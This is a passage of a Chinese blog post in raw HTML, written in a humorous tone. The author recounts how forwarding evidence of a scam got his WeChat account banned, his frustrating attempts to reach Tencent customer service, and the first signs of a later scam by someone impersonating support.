src="https://wechat2rss.xlab.app/img-proxy/?k=74606a28&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn0IANTibVTz5pmzfTnsfUNtFBQGnUWDWvxmym3x0cMgfnrRA8GrD4mPw%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">9</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">2023年1月31日中午13点04分，我转发到第二个群的聊天记录刚刚发送出去，yuxge给我的苹果才啃到一半，我的微信号被秒退出了，提示账号状态异常，要根据提示操作。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.4895330112721417" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=9770cf6a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnwXXicm1wSa7VOMlpHIzQeLQpnqXvoNLDd6LAHB3BuC7YYR21SrOpBOw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">10</figcaption></figure><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>牛仔很忙</h2><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>重生之我是Joker<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">重新登录之后，微信团队提醒 “组织或参与网络刷单等违规行为”。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">结合这高强度的时效性，我马上明白过来，应该是我刚才转发的内容被我鹅流弊的风控识别成诈骗了。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><strong style="font-weight: bold;color: black;">是的，我的号被给yuxge买水果的骗子搞封了。</strong></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.6272141706924316" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=fcaf452d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn4dHuCnhBgdT8ViaLiac4mZLNjFKVribq8kB4DB7yEH9SSMtHD6YW0oRrQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">11</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.2439613526570048" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=a62db7ae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnWHzxLHsvERhDBRSlbdgQumxZibNe8NFHrbEoEpXA9r4aoXgzSodxicvA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">12</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">开始以为只是个警告，按照步骤一直操作，但是点到最后面才发现这是一个封号（封大部分功能）处罚。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">并且提示我多次违规，本次升级处罚.......</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">（之前确实被封过一次，但完全猜不到原因，一觉醒来那种。当时猜测可能是因为转发群里的上海图片的追封，虽然封我时距离我转发图片的时间已经时隔非常久）</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.4516908212560387" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=b8388ea7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnnEzmicNib4k4DVtD5FUiabMOOocCBtMeEndGkppnjuJLuA0LGibllwABSA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">13</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.8913043478260869" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=a51f8bee&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnGUGzlTicMfRicRkL1aJXgGMdJQvnjUOh3kZWavvXBDOVeOhotOxYPcWg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">14</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">填身份证、行业、申请说明、手持身份证自拍、在线签名，经过耻辱感拉满的复审流程，我仍然还认为这完全是一次美丽的错误，信心满满的提交申诉后我还打了会儿球。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.7163577759871071" data-s="300,640" style="" data-type="jpeg" data-w="1241" src="https://wechat2rss.xlab.app/img-proxy/?k=26b4a2ee&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnuIsGA5OGrFfzyRoHsxZ66Qq3OFae7VWXCzlzDT4KJRZCibjzp4vKjmQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">15</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="2.1642512077294684" data-s="300,640" style="" data-type="png" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=06703440&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnXBuGM5eNEuMfibRkGwQ5F0vf0tmMohAxqsGuwNIw0nR138Mm0sUADyg%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">16</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.8462157809983897" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=07d97bba&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnbpeS53NWHoPkLwo3nuJ1j1sLZ0q7ljkZcMrWIJMR7icGFy9MIC6icr0w%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">17</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.6384863123993558" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=bd6580dd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnu8AP9RJibhwosDIibRwKNDCVXvvCuXiciaMNEShXxVIaZCwWauBiaicbJJEw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">18</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">2023年1月31日中午13点58分，准备回去继续搬砖的我发现手机收到了 “人工核实违规属实，不予解封。” 的通知，我逐渐开始不理解。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7359098228663447" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=b89f96b6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnpgghuraxXcaPicibEgUiblNRfo9ggf84LnVwGY04X6kI551ibBxJd7yObA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">19</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.5966183574879227" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=fb7b6ec6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhno4STeFb23kiaEwl9UkEqibrB03VrHfkwZbkUlJgHFeE8a1tZtZjiabFpw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">20</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">回到公司后的我心情是十分复杂的，毕竟就在刚才，吃到骗子花钱买的水果时，我还在群里风光无限的显摆。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">但此时的我却不得不面对 <strong style="font-weight: bold;color: black;">“骗子二次注入把我微信号给我干封了，审核还给我实锤有罪、加重处罚”</strong> 这个事实。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.528125" data-s="300,640" style="" data-type="png" data-w="640" src="https://wechat2rss.xlab.app/img-proxy/?k=1e5d4ff9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnGfsLibm1E4A87T2zhKI77aD1XX2HYhApyO7cvOMtzZLiaXqk2Hh2CjWQ%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">21</figcaption></figure><p data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;line-height: 1.6;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">会有正义么？</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">即使已经没有线上申诉的机会（线上申诉只给一次机会，没过的话就只能等自己解封），<strong style="font-weight: bold;color: black;">此时的我仍然认为正义可能会迟到，但肯定不会缺席</strong>。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">虽然这件事解释起来有点滑稽，我开始尝试寻找人工客服的通道，准备在电话里澄清这一切！</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">但是我打过一波电话，也许是自己手脚太笨，没能找到人工通道的入口。也许是人工客服太忙了吧，那我再多打几次试试。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.4871175523349436" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=a13624e0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn1Pf658UNla5aSF72Mu83zxYJjohiaMibnKEMP9vPiaa4r7cpjI9GDFt3g%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">22</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">把包括DNF客服电话之类的好几个号码都试了一遍，也没能接入人工，按照提示咨询微信号相关事宜，等输完自己被封的账号后，得到的机器人回复只有类似 “您的封号是经过实锤的，请等待到期自动解封” 这种回复。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">此时的我开始去互联网寻求帮助，虽然小红书有些帖子说打XXX电话直接忽略提示按0即可接入，但是我试过之后发现也没能打通。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.0579710144927537" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=260b7f65&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnx1ibiaWx5u0OAYelkiaGoUyKHQOObojAPEyLXGkJ87gJH5gibndtjIzDQg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">23</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">后来我寻找了小程序、公众号等等渠道都没有找到，我一拳打在工地墙上，仰天长啸，<strong>“我好笨啊！！”</strong> BGM起，雪花飘飘，北风萧萧～～～<br/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">忽然，此时我在小红书看到一种令人眼前一亮的姿势，即<strong style="font-weight: bold;color: black;">通过在 “腾讯客服” 这个微博超话发帖，来等待客服来评论区与你私信建立联系</strong>。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我马不停蹄的去超话来了一帖，图文并茂，细节描述的相当详尽，自认为给到客服的压力相当大，坐等客服主动来找我。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">大概不到十分钟，终于等到了客服在我帖子下面评论，我心想还是PR的压力大啊，我终于通过这种非主流的姿势跟人工客服建立联系了。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.1539708265802269" data-s="300,640" style="" data-type="jpeg" data-w="1234" src="https://wechat2rss.xlab.app/img-proxy/?k=2220b726&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhniamS20NtRFttA0iaxYbjmvhWOFibN1tL1icR0dmafubkYFJjgUwXfsjC2A%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">24</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">但是出于未知的原因，腾讯的人工客服似乎确实私信了我，但我也确确实实的没有收到私信。也许是像我朋友说的微博有时候会丢私信，也许是我自己没有看到，总之没收到怪我自己，不怪客服。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">当时没有收到消息的我以为客服根本没有私聊我，而只是在超话下面回复了我的评论。感觉自己像个冤种，<strong style="font-weight: bold;color: black;">并且以为连续被欺骗两次</strong>的自己，此时双重愤懑叠加。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.16917293233082706" data-s="300,640" style="" data-type="jpeg" data-w="1064" src="https://wechat2rss.xlab.app/img-proxy/?k=c5bcd825&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnnLD8bRl9vUBNiayJVz9BbCicLraatQzIs4RJzwJfRgNrAzShSCw1ZD8w%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">25</figcaption></figure><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>入地无门<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">完全是出于发泄、不信邪的重复拨打腾讯客服电话，重复在电话里进入微信申诉步骤，竟然在第N次的重复时，在提示音的末尾听到了不一样的提示 “人工服务请按0”！</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我整一个惊呼，原来努力真的会有收获，<strong style="font-weight: bold;color: black;">古人诚不欺我，妙哉。</strong></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1" data-s="300,640" style="" data-type="png" data-w="240" src="https://wechat2rss.xlab.app/img-proxy/?k=f5c07922&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnLP6Wd9hant9qdwgzZdVqPDYonSZCRumcG80U5LNlPSSQSUtFC4PfPA%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">26</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">但是进入人工客服，我小心谨慎的解释完我的问题后，客服的回复是 “微信号的封禁是人工审核的结果，谁也没办法解封，只能等自动解封”。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">都不等我开口接话，客服自顾自说完之后直接就把电话挂掉了。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我整一个愤懑x3，现在的<strong style="font-weight: bold;color: black;">我不仅想为自己找回清白，还想找地方举报客服态度无礼</strong>。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">但是试了几次都是这种结果，仿佛世界都很忙，就我一个人在闲逛。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7037037037037037" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=45032b7f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnKicZ6JxT0nJh7gYicAxnuiccvibrJ1RibXrSYZrUUjQuldJ7vhwZMm3eBDw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">27</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">忘记是三次还是四次之后，系统提示音又变了，类似 “系统检测到您已经多次拨打，为您接入客服” 之类的，这时接电话的小姐姐感觉说话多了点感情，感觉上像是专门处理疑难杂症的小组长一样的角色。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我感觉上帝还是给我递来了救命稻草，因为重复解释过很多遍，<strong style="font-weight: bold;color: black;">我熟练且从容的向她解释这一些，并且强调我的出发点是警示</strong>、提醒朋友们不要上当，另外两个群聊都是四五个熟人的小群（没有造成多大的影响）。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">37度的她仍然重复着跟之前一样冰冷的话，我追问她<strong style="font-weight: bold;color: black;">难道以后警示别人不要上当就要被封号么？</strong>她的观点是人工封禁的肯定是有理由的。我追问难道人工就不会错么？如果我对人工的处理结果有意见，去哪里反馈和投诉？你把投诉电话给我。她的原话大概是 <strong style="font-weight: bold;color: black;">“我这里就是客服啊”</strong>。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我突然意识到 “客服” 这类部门的强悍，就像很少有人能去内审内审，谁又能去投诉专门处理投诉的客服呢？</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我的心情经历怒愤、羞愤，到现在只剩悲愤，以及理智崩坏边缘。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.6924778761061947" data-s="300,640" style="" data-type="jpeg" data-w="904" src="https://wechat2rss.xlab.app/img-proxy/?k=09062432&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhncBJBX2lODibPZ11bzMDXs8GELgmgEa1g3sZrAnxoZ4ICopO4sse21eg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">28</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我制作了一张超长图，大概就是这荒谬的一切，托朋友转发到群里，来宣告接下来我安详的三天。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.8158803222094362" data-s="300,640" style="" data-type="jpeg" data-w="869" src="https://wechat2rss.xlab.app/img-proxy/?k=ff128e61&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn3nJzd00pYenxp3BLgBh3jIGAicgKxbLzOcmHZgmfKWvib1gjyDH4R61A%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">29</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">上次被封号是封功能，看不到所有群聊的消息。这次可以看到群内的消息，但是没法参与讨论。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">一开始有时会忘记自己阶下囚的身份，想插句嘴，顶出来一个大红感叹号时才想起来自己并非自由身。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.274582560296846" data-s="300,640" style="" data-type="jpeg" data-w="1078" src="https://wechat2rss.xlab.app/img-proxy/?k=7a229055&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnExhaXbUukX6LbJkrfZNCVb5VKPQg3vutdvic2qHATNia9dSzGUHQncoQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">30</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">比较尴尬的是有乙方在群里喊我发言，又不想被他们知道我号被封了，我只能假装高冷。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">更尴尬的是后来拍一拍忘了改，我这乙方又拍了拍我，不知道发生了啥的他一阵长久沉默。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.19082125603864733" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=f1aff405&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnhCiajRP4VoEic6Sic1R6AYUribiadphTIibnuPOxkVPCNulY1MwtgUoicnOQw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">31</figcaption></figure><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>第三波骗子 - 金牌黑客</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">流水账结束，重量级嘉宾出场。</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>善良的茉莉<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">正常像微博这种非常用的app我都是关闭所有提醒，但是为了等腾讯客服的一个小红点，那天虔诚的我把微博提醒全部打开了。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">有一天我发现锁屏界面有微博的消息，有个叫 <strong style="font-weight: bold;color: black;">“茉俪f”</strong> 的人来我以前转发的微博下面评论，她提醒我千万不要被骗，有人冒充腾讯客服。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.24396135265700483" data-s="300,640" style="" data-type="jpeg" data-w="1242" 